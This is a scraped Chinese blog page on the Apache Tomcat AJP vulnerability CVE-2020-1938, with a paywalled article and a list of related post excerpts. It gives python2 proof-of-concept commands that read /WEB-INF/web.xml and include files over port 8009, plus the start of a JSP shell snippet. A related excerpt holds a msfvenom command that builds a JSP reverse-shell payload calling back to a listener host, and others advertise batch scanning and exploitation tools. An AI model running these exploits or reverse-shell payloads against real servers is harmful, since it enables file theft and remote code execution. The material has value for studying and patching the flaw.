CVE-2020-1938(tomcat root目录下文件读取文件包含)

最新推荐文章于 2024-08-06 10:45:39 发布
最新推荐文章于 2024-08-06 10:45:39 发布
阅读量478 收藏
点赞数
分类专栏: 漏洞分析 文章标签: 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/Lelouch_E/article/details/109721999
版权
本文详细介绍了Apache Tomcat的CVE-2020-1938漏洞,影响多个版本。该漏洞允许攻击者通过AJP Connector在特定条件下实现文件读取和包含。文章涵盖了影响的Tomcat版本、前提条件,并提供了文件读取、文件包含的操作说明,以及如何利用此漏洞写入shell并弹出bash。此外,还附带了POC和bash编码转换的相关链接。
摘要由CSDN通过智能技术生成

影响版本:

  • Apache Tomcat 9.x < 9.0.31
  • Apache Tomcat 8.x < 8.5.51
  • Apache Tomcat 7.x < 7.0.100
  • Apache Tomcat 6.x

前提条件:

  AJP Connector 服务端口 (默认8009)

文件读取

python2 "Tomcat-ROOT路径下文件读取(CVE-2020-1938).py" -p 8009 -f /WEB-INF/web.xml 127.0.0.1

在这里插入图片描述

文件包含

python2 "Tomcat-ROOT路径下文件包含(CVE-2020-1938).py" -p 8009 -f /test.txt 127.0.0.1

在这里插入图片描述

  • 写入shell.txt 弹shell
<%
    java.io.InputStream in = Runtime.ge
最低0.47元/天 解锁文章
Lelouch_E
关注
专栏目录
13-3 tomcat AJP文件包含漏洞(CVE-2020-1938
weixin_43263566的博客
12-02 1111
CVE-2020-1938 是一个影响 Tomcat 的 AJP文件包含漏洞。攻击者可以利用该漏洞通过 Tomcat AJP Connector 读取或包含 Tomcat 上所有 webapp 目录下的任意文件,例如配置文件或源码。如果目标应用有文件上传功能,攻击者还可以利用文件包含漏洞实现远程代码执行,造成严重的安全风险。这一漏洞的发现者为长亭科技安全研究员。由于 Tomcat AJP 协议设计上的缺陷,该漏洞存在于 Tomcat 中。影响范围ApacheTomcat 6Apache。
【网络安全---漏洞复现】Tomcat CVE-2020-1938 漏洞复现和利用过程(特详细)
2401_83946570的博客
04-19 986
python2 ‘Tomcat-ROOT路径下文件读取(CVE-2020-1938).py’ -p 8009 -f /WEB-INF/web.xml 192.168.31.160。
文件包含漏洞--Apache TomcatCVE-2020-1938
weixin_44940180的博客
08-19 513
Apache Tomcat存在文件包含漏洞 该漏洞是由于Tomcat AJP协议存在缺陷而导致 攻击者利用该漏洞可通过构造特定参数,读取服务器webapp下的任意文件 若目标服务器同时存在文件上传功能,攻击者可进一步实现远程代码执行。 影响范围 受影响版本 Apache Tomcat 6 Apache Tomcat 7 < 7.0.100 Apache Tomcat 8 < 8.5.51 Apache Tomcat 9 < 9.0.31 不受影响版本 Apache Tomcat
Tomcat AJP 文件包含漏洞(CVE-2020-1938
m0_61506558的博客
11-20 8054
1.漏洞简介1.漏洞简介2020年2月20日,公开CNVD 的漏洞公告中发现 Apache Tomcat文件包含漏洞(CVE-2020-1938)。是Apache开源组织开发的用于处理HTTP服务的项目。Apache Tomcat 服务器中被发现存在文件包含漏洞,攻击者可利用该漏洞读取或包含Tomcat上所有webapp目录下的任意文件。该漏洞是一个单独的文件包含漏洞,依赖于Tomcat的AJP(定向包协议)。AJP自身存在一定缺陷,导致存在可控参数。
CVE-2020-1938 漏洞复现
最新发布
weixin_57682301的博客
08-06 150
3.右键在此文件夹打开终端,并且输入 python2 Tomcat-ROOT路径下文件包含(CVE-2020-1938) -p8009 -f 木马文件夹名 ip。2.打开kali下载cve2020-1938。1.搭建环境并且打开点击任何地方都不能输入。
CVE-2020-1938 Apache Tomcat 文件包含漏洞复现
weixin_43102772的博客
03-09 5429
CVE-2020-1938 Apache Tomcat 文件包含漏洞复现
CVE-2020-1938
sechelper的博客
12-07 1068
CVE-2020-1938漏洞复现
【网络安全---漏洞复现】Tomcat CVE-2020-1938 漏洞复现和利用过程
m0_60607371的博客
04-06 1122
python2 ‘Tomcat-ROOT路径下文件读取(CVE-2020-1938).py’ -p 8009 -f /WEB-INF/web.xml 192.168.31.160。
CVE-2020-1938 Tomcat远程文件包含漏洞
mirocky的博客
10-13 458
CVE-2020-1938是由长亭科技安全研究员发现的存在于 Tomcat 中的安全漏洞,由于 Tomcat AJP 协议设计上存在缺陷,攻击者通过 Tomcat AJP Connector 可以读取或包含 Tomcat 上所有 webapp 目录下的任意文件,例如可以读取 webapp 配置文件或源代码。此外在目标应用有文件上传功能的情况下,配合文件包含的利用还可以达到远程代码执行的危害。
CVE-2020-1938:CVE-2020-1938
03-20
CVE-2020-1938 工具仅用于安全研究以及内部自查,禁止使用工具发起非法攻击,造成的后果由用户负责 通过测试研究发现,该突破危害及其严重,涉及非常广泛,如果发现建议立即进行修复 apache-tomcat-8.5.32.zip测试tomcat 验证工具-1(有BUG): 任意文件读取 java -jar 1.jar com.threedr3am.bug.tomcat.ajp.FileRead 127.0.0.1 8009 file /index.jsp 文件包含 java -jar 1.jar com.threedr3am.bug.tomcat.ajp.FileRead 127.0.0.1 8009 jsp /index.jsp 打包方式:在目录tomcat / ajp-bug执行mvn clean compile assembly:assembly 来源: : 验证工具-2
CVE-2020-1938.zip
04-15
CVE-2020-1938 AJP 文件包含利用脚本,可读取网站文件源代码,满足相应条件可以任意命令执行,反弹shell
CVE-2020-1938TomcatAjpScanner-master.zip
02-23
CVE-2020-1938 tomcat漏洞批量扫描攻击!CVE-2020-1938 tomcat漏洞批量扫描攻击!CVE-2020-1938 tomcat漏洞批量扫描攻击!CVE-2020-1938 tomcat漏洞批量扫描攻击!CVE-2020-1938 tomcat漏洞批量扫描攻击!
CVE-2021-21166
weixin_48300170的博客
07-14 1318
CVE-2021-21166 Chrome 远程代码执行0 Day 漏洞复现漏洞简介漏洞信息漏洞原理环境搭建漏洞复现漏洞修复 漏洞简介       在2021年2月11日,微软浏览器漏洞研究团队的研究员 Alison Huffman提交一个0day漏洞。       一个类Unix操作系统在命令参数中转义反斜杠时存在基于堆的缓冲区溢出漏洞。当sudo通过-s或-i命令行选项在shell模式
tomcat CVE-2020-1938
qq_46804551的博客
04-08 123
搭建 下载好运行即可 访问成功 漏洞复现 Tomcat默认开启AJP服务(8009端口),存在一处文件包含缺陷。 攻击者可以通过构造的恶意请求包来进行文件包含操作,从而读取有漏洞的Tomcat服务器上Web目录文件。 漏洞验证POC https://github.com/YDHCUI/CNVD-2020-10487-Tomcat-Ajp-lfi 漏洞验证,尝试读取文件: https://github.com/YDHCUI/CNVD-2020-10487-Tomcat-Ajp-lfi 成功访问到配置文
CVE-2020-1938 Tomcat 文件读取包含漏洞复现
yzl_007的博客
07-26 2579
CVE-2020-1938 Tomcat 文件读取包含漏洞复现 一次偶然的契机,起源于自己的站被日了,太菜了没找到原因,然后逛了逛室友的站,室友的友链中随便点了点友链什么的,发现shadon发现开了很多端口,并且同时打开了8009和8080 想到最近爆出的文件包含漏洞,扫一下果真存在,也验证成功了,读取到了web.xml的源码 用网上的脚本跑一下,读取WEB-INF/web.xml文件 读取ROOT目录下的build.xml文件内容,没用这个文件,就会跳转到错误页面 下面是自己搭建环境后的CVE-
CVE-2020-1938(RCE利用)
热门推荐
午夜安全
03-27 1万+
CVE-2020-1938(RCE利用) 1.使用msf生成反弹shell马,并且监听 msfvenom -p java/jsp_shell_reverse_tcp LHOST=192.168.223.129 LPORT=6666 R > shell.png 假设利用上传点,把此图片上传到了目标服务器/log/shell.png。 在msf监听: msf > use expl...
Tomcat 文件读取漏洞(CVE-2020-1938) 如何处理
09-09
对于Tomcat文件读取漏洞(CVE-2020-1938),以下是一些处理方法: 1. 更新Tomcat版本:确保您使用的Tomcat版本已修复了该漏洞。Apache官方发布了修复程序的Tomcat版本,您应该升级到最新版本。 2. 配置安全限制:...
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值